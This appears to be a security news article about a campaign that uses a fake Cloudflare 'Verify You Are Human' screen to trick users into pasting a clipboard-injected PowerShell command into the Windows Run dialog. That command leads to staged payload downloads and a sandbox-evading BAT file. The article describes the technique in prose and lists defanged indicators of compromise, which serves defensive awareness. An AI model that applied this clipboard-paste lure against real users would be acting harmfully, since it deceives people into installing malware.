In a sophisticated new wave of social engineering attacks, cybercriminals are exploiting users’ trust in security measures by deploying a convincing fake Cloudflare verification screen.
This attack chain extends beyond traditional phishing, cleverly manipulating victims into executing malware that is deeply embedded within their systems.
The Attack – Mimicking Security to Breach It
The campaign begins when users land on a malicious webpage, often by clicking on links in phishing emails or malicious ads. Instead of being greeted by the expected website, they see a replica of the familiar Cloudflare “Verify You Are Human” CAPTCHA screen.
The victim, believing it to be a standard security measure, is asked to click the “Verify” button to proceed.
Unbeknownst to the user, this action triggers a complex multi-stage attack. As soon as the button is pressed:
- PowerShell Injection via Clipboard: The website invisibly inserts a malicious PowerShell command into the user’s clipboard.
- IP Address Harvesting: Simultaneously, the victim’s IP address is silently captured and logged by the attacker.
The user is then prompted to undertake an “additional verification step,” typically involving opening the Run prompt (via Windows + R).
The attacker’s site monitors keystrokes and detects when the prompt is opened, at which point it sends a notification (webhook) to the attacker’s server, confirming the attack’s progress.
Payload Delivery – Escalating the Breach
If the victim pastes the clipboard contents into the Run dialog as instructed, a chain reaction commences:
- Remote Command Retrieval: The original PowerShell script pulls a new, Base64-encoded PowerShell payload from pastesio[.]com, further obscuring its intent.
- BAT File Download and Execution: The decoded payload downloads and executes a Windows batch (.BAT) file from axiomsniper[.]info.
Before executing any malicious actions, the BAT file checks for evidence of a virtual machine environment, a common sign of a sandbox or analysis machine used by security researchers.
If detected, the malware exits gracefully, thereby decreasing the likelihood of detection. If running on a real user’s machine, the malware proceeds to install secondary payloads, potentially opening the door to data theft, ransomware, or remote control.
Alarmingly, this BAT file is currently undetected by all major antivirus vendors, according to VirusTotal scans, making it a powerful tool for cybercriminals.
Indicators of Compromise and Mitigation
Key domains involved in the attack include:
- dex-redirect[.]com
- pastesio[.]com
- axiomsniper[.]info
Security researchers recommend heightened vigilance for any unexpected Cloudflare screens prompting unusual steps, and urge organizations to monitor for connections to these IOCs.
Users should be cautious of verification processes that require local command execution, especially those involving PowerShell or clipboard operations.
As attackers continue to innovate, layered security awareness and threat hunting remain crucial defenses against such deceptive threats.
